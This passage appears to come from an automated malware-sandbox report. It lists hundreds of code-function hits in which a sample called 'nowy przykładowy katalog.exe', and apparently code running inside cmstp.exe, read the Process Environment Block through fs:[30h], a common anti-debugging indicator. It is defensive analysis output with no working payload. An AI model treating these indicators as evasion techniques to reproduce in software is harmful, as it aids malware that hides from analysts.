          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009C8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009F37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009DF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A8070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A8070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009EE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A4FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00A88F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_009CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04702073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04711074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04660050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04660050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04714015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04714015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04701C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0471740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0471740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0471740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046458EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047014FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046890AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04683D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04667D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04664120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04653D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046CA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04674D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04674D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04674D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046D41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046F8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046735A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04671DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04671DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04671DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_047105AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04642D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04642D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04642D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04642D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04642D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04672990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046FB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0468927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0466AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04649240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04657E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0470AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046D4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04684A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04684A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046FFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04678E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04658A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04645210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04645210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04645210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04645210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04701608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04663A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_0467A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_0467A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04672AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_046716E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_046576E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04718ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_046736CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04672ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_046FFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04688EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_046C46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04710EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 11_2_04710EA5 mov eax, dword ptr fs:[00000030h]
